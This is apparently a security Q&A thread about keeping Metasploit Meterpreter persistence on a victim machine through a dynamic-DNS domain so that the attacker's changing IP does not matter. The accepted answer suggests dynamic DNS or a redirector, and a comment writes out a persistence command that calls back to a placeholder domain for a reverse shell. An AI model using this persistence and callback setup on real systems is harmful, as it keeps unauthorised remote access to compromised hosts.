# Can I use a domain name instead of an IP for msf persistence?

Tags: dns, metasploit, meterpreter

After getting a `shell` (`meterpreter`) on the victim, the first thing to do is to migrate and get the `system`, and then you would install a persistence to connect back to you. But the problem is the dynamic IP of my attacking machine.

I was wondering if I can install a persistence in the victim to connect back to a website, so the victim will always be connecting to the the server that is running the website, so every time my WAN IP changes, I forward that domain name to the new IP. Maybe using  [freenome.com](http://www.freenom.com/) ?

So is that possible ?

Comment: EHY: If you think that the edit of the title doesn't match your intent, you can rollback the change.

Answer (score 4, accepted):

There are lots of better ways to do this. First, you could set up a free dynamic DNS service that will update with the changes to your IP, and you configure your persistence module to connect to the DNS name.

Or, you could use the website's IP in the persistence module, and simple tunnel/pivot/redirect traffic from there to your attacking machine.

Comment: so i used freenom.com and got a free doamin-name, i forwarded it to my ip, runned the persistence like the following:    ""run persistence -U -X -r example.tk -r 4545"" and the persistence is installed, restarted the router to change ip and forwarded the domain name trafic (exapmple.tk) to my new ip and i dont get a shell... whats the problem?